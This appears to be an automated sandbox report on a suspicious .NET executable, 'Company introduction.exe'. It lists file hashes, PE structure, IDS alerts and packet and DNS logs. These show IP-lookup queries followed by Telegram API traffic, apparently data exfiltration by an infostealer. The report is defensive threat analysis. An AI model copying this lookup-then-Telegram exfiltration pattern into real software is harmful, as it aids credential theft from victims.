                                                                                                                                                  Entropy (8bit):7.674812972167672
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                  File name:Company introduction.exe
                                                                                                                                                  File size:854'528 bytes
                                                                                                                                                  MD5:10f72e53a2c9f106093c233b56a3a819
                                                                                                                                                  SHA1:e8a63836ff90493559b69a1bc6d6080ba9370a99
                                                                                                                                                  SHA256:84e892d4627a3a3aa053b30200788bd6942c046d2dadcf5121017a32e10142f2
                                                                                                                                                  SHA512:cd83c1b9c6128b852f36f97a387c4c89b781f0b0b52702540b12c5878129a0352c3edc2c12e2fb13e8f159256272338833715c3d78d98c4a195b8e50bd1ebce2
                                                                                                                                                  SSDEEP:24576:XsJN+UVsa/olYFjQyPIoqtpGFjcrpTZ6q6U7jbHXM:83+UfxFsyPIoqcETHFXX
                                                                                                                                                  TLSH:7205D0C03B2A7311DDACBA34853BDDB9A2642D38B00479E26EDD2B5776DD1039A1CF45
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.............2.... ... ....@.. .......................`............@................................
                                                                                                                                                  Icon Hash:0066b49631f8dc38
                                                                                                                                                  Entrypoint:0x4d1032
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x67871BE8 [Wed Jan 15 02:22:32 2025 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:4
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:4
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                  Instruction
                                                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                                                  lodsd
                                                                                                                                                  fiadd word ptr [eax]
                                                                                                                                                  add bh, ch
                                                                                                                                                  mov esi, CAFE0000h
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  mov esi, 000000BAh
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd0fe0 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd2000 | 0x126c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xcf048 | 0xcf200 | 4821f738bd26c6e31e04e0b0d037e9eb | False | 0.8769696269613759 | data | 7.681146035096391 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xd2000 | 0x126c | 0x1400 | dada842701f0d675dbc615b6d00973e9 | False | 0.7080078125 | data | 6.393064731157026 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd4000 | 0xc | 0x200 | abb73554162131666411a8df5fbbc290 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd2100 | 0xbdf | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9348469891411648
RT_GROUP_ICON | 0xd2cf0 | 0x14 | data | | | 1.05
RT_VERSION | 0xd2d14 | 0x358 | data | | | 0.4287383177570093
RT_MANIFEST | 0xd307c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-15T08:39:04.279464+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49733 | 193.122.6.168 | 80 | TCP
2025-01-15T08:39:05.257413+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49733 | 193.122.6.168 | 80 | TCP
2025-01-15T08:39:05.771201+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49735 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:06.498360+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49738 | 193.122.6.168 | 80 | TCP
2025-01-15T08:39:06.607571+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49737 | 193.122.6.168 | 80 | TCP
2025-01-15T08:39:07.451354+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49737 | 193.122.6.168 | 80 | TCP
2025-01-15T08:39:08.006925+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49743 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:08.704094+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49745 | 193.122.6.168 | 80 | TCP
2025-01-15T08:39:09.261798+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49747 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:10.767027+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49752 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:12.063724+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49756 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:14.296041+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49763 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:14.542062+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49764 | 104.21.48.1 | 443 | TCP
2025-01-15T08:39:15.625059+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49766 | 149.154.167.220 | 443 | TCP
2025-01-15T08:39:17.808179+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49773 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                  Jan 15, 2025 08:39:06.540509939 CET44349741104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:06.540585041 CET49741443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:06.544745922 CET49741443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:06.544764996 CET44349741104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:06.607570887 CET4973780192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:06.879595041 CET44349740104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:06.881675005 CET49740443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:06.881705999 CET44349740104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.014489889 CET44349741104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.014605999 CET49741443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.015917063 CET49741443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.015944958 CET44349741104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.017153978 CET44349741104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.022965908 CET44349740104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.023116112 CET44349740104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.023226976 CET49740443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.023520947 CET49740443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.028381109 CET4974280192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:07.033152103 CET8049742193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.033409119 CET4974280192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:07.033612013 CET4974280192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:07.038358927 CET8049742193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.091975927 CET49741443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.114553928 CET49741443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.155366898 CET44349741104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.218830109 CET44349741104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.218977928 CET44349741104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.219049931 CET49741443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.221389055 CET49741443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.225227118 CET4973780192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:07.230093956 CET8049737193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.410420895 CET8049737193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.414206982 CET49743443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.414273977 CET44349743104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.414346933 CET49743443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.414882898 CET49743443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.414917946 CET44349743104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.451354027 CET4973780192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:07.667814970 CET8049742193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.669457912 CET49744443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.669502020 CET44349744104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.669557095 CET49744443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.669836998 CET49744443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.669845104 CET44349744104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.716958046 CET4974280192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:07.893307924 CET44349743104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:07.895109892 CET49743443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:07.895190001 CET44349743104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.006998062 CET44349743104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.007184029 CET44349743104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.007237911 CET49743443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:08.007622004 CET49743443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:08.011071920 CET4973780192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:08.012379885 CET4974580192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:08.015991926 CET8049737193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.016037941 CET4973780192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:08.017214060 CET8049745193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.017287016 CET4974580192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:08.017352104 CET4974580192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:08.022181988 CET8049745193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.131972075 CET44349744104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.133860111 CET49744443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:08.133898973 CET44349744104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.280589104 CET44349744104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.280750036 CET44349744104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.280919075 CET49744443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:08.283977032 CET49744443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:08.284686089 CET4974280192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:08.285794973 CET4974680192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:08.289814949 CET8049742193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.289941072 CET4974280192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:08.290616035 CET8049746193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.290771961 CET4974680192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:08.290771961 CET4974680192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:08.295557022 CET8049746193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.652220964 CET8049745193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.653959036 CET49747443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:08.654038906 CET44349747104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.654453993 CET49747443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:08.655145884 CET49747443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:08.655194998 CET44349747104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.704093933 CET4974580192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:08.917781115 CET8049746193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.919297934 CET49748443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:08.919359922 CET44349748104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.919569016 CET49748443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:08.919796944 CET49748443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:08.919811964 CET44349748104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:08.967004061 CET4974680192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:09.114896059 CET44349747104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.116440058 CET49747443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:09.116497040 CET44349747104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.261903048 CET44349747104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.262048960 CET44349747104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.262137890 CET49747443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:09.262597084 CET49747443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:09.267399073 CET4974980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:09.272267103 CET8049749193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.272422075 CET4974980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:09.272509098 CET4974980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:09.277319908 CET8049749193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.382091045 CET44349748104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.383681059 CET49748443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:09.383765936 CET44349748104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.512403011 CET44349748104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.512572050 CET44349748104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.512648106 CET49748443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:09.512984037 CET49748443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:09.518853903 CET4974680192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:09.520057917 CET4975080192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:09.523864985 CET8049746193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.523947001 CET4974680192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:09.524903059 CET8049750193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.524981022 CET4975080192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:09.525104046 CET4975080192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:09.529843092 CET8049750193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.906088114 CET8049749193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.907455921 CET49751443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:09.907514095 CET44349751104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.907663107 CET49751443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:09.907923937 CET49751443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:09.907954931 CET44349751104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:09.951343060 CET4974980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:10.149517059 CET8049750193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.151324987 CET49752443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:10.151391029 CET44349752104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.151473999 CET49752443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:10.151765108 CET49752443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:10.151777983 CET44349752104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.201339006 CET4975080192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:10.378037930 CET44349751104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.386203051 CET44349766149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.386636019 CET44349766149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.388571978 CET49766443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:15.435349941 CET44349766149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.459842920 CET44349767104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.462754011 CET49767443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:15.462774992 CET44349767104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.605343103 CET44349767104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.605403900 CET44349767104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.605588913 CET49767443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:15.606338024 CET49767443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:15.611936092 CET4976980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:15.612059116 CET4976580192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:15.616844893 CET8049769193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.617036104 CET4976980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:15.617134094 CET4976980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:15.617321968 CET8049765193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.620997906 CET4976580192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:15.621965885 CET8049769193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.625099897 CET44349766149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.625180006 CET44349766149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.625262976 CET49766443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:15.632951021 CET49766443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:16.274338007 CET8049769193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.276129961 CET49770443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:16.276228905 CET44349770104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.276320934 CET49770443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:16.276633978 CET49770443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:16.276671886 CET44349770104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.326411963 CET4976980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:16.753818035 CET44349770104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.755830050 CET49770443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:16.755858898 CET44349770104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.890670061 CET44349770104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.890865088 CET44349770104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.890986919 CET49770443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:16.891935110 CET49770443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:16.920808077 CET4976980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:16.926021099 CET8049769193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.926264048 CET4976980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:16.927175045 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:16.927268982 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.928174019 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:16.928612947 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:16.928669930 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.564191103 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.564307928 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:17.589514971 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:17.589560032 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.589965105 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.610655069 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:17.655340910 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.808172941 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.808254004 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.808362961 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:17.836663008 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:32.054512978 CET4973880192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:34.231540918 CET4974580192.168.2.4193.122.6.168
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 15, 2025 08:39:03.333297968 CET | 58540 | 53 | 192.168.2.4 | 1.1.1.1
Jan 15, 2025 08:39:03.340167999 CET | 53 | 58540 | 1.1.1.1 | 192.168.2.4
Jan 15, 2025 08:39:04.226078033 CET | 49542 | 53 | 192.168.2.4 | 1.1.1.1
Jan 15, 2025 08:39:04.233692884 CET | 53 | 49542 | 1.1.1.1 | 192.168.2.4
Jan 15, 2025 08:39:14.735824108 CET | 60150 | 53 | 192.168.2.4 | 1.1.1.1
Jan 15, 2025 08:39:14.742846966 CET | 53 | 60150 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 15, 2025 08:39:03.333297968 CET | 192.168.2.4 | 1.1.1.1 | 0x5372 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 15, 2025 08:39:04.226078033 CET | 192.168.2.4 | 1.1.1.1 | 0xf293 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 15, 2025 08:39:14.735824108 CET | 192.168.2.4 | 1.1.1.1 | 0x5849 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 15, 2025 08:39:03.340167999 CET | 1.1.1.1 | 192.168.2.4 | 0x5372 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 15, 2025 08:39:03.340167999 CET | 1.1.1.1 | 192.168.2.4 | 0x5372 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
